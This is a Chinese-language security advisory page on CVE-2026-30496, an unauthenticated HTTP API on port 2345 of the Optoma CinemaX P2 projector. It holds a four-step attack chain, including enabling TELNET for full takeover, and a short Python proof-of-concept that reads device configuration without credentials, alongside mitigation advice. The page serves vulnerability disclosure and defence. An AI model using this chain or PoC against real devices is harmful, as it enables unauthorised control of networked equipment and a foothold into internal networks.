IPBUF安全漏洞报告
English
CVE-2026-30496 CVSS 9.8 严重

CVE-2026-30496 Optoma投影仪未授权远程控制漏洞

披露日期: 2026-05-07

漏洞信息

漏洞编号
CVE-2026-30496
漏洞类型
权限缺失
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Optoma CinemaX P2

相关标签

权限缺失未授权访问IoTOptoma远程控制

漏洞概述

Optoma CinemaX P2投影仪存在严重安全漏洞,其TCP 2345端口的HTTP API未进行身份验证。攻击者无需认证即可远程读取配置并控制设备设置,严重影响设备安全及可用性。

技术细节

Optoma CinemaX P2投影仪运行基于Android 8.0.0的系统,固件版本TVOS-04.24.010.04.01存在权限缺失漏洞。设备在TCP 2345端口开启HTTP服务,暴露了约74个API端点用于管理。由于缺乏认证机制(AV:N/AC:L/PR:N),同网络下的攻击者可直接发送请求读取敏感配置或执行修改操作。利用方式简单,无需用户交互,攻击者可控制电源、音量、网络协议(如开启TELNET)等关键功能,导致设备完全被接管,并可能作为跳板威胁内网。

攻击链分析

STEP 1
1. 网络扫描
攻击者扫描局域网内开放TCP 2345端口的主机,识别Optoma CinemaX P2设备。
STEP 2
2. 发送探测请求
向目标设备的2345端口发送HTTP请求,访问API端点(如配置读取接口)。
STEP 3
3. 验证漏洞
收到服务器响应,确认无需身份验证即可获取设备信息或执行操作。
STEP 4
4. 执行攻击
利用API接口修改电源状态、音量或开启TELNET服务,实现完全控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_exploit(target_ip): # Target port 2345 as described in CVE url = f"http://{target_ip}:2345/api/config" try: # Send unauthenticated request response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] Target is vulnerable. Config data: {response.text[:100]}...") return True except Exception as e: print(f"[-] Connection failed: {e}") return False if __name__ == "__main__": check_exploit("192.168.1.10")

影响范围

Optoma CinemaX P2 TVOS-04.24.010.04.01

防御指南

临时缓解措施
建议立即检查设备固件版本并升级。若无法立即升级,应在交换机或防火墙层面对TCP 2345端口进行访问控制,仅限可信IP访问。同时,修改设备默认密码(虽然此漏洞绕过认证,但作为常规安全措施),并监控网络异常流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表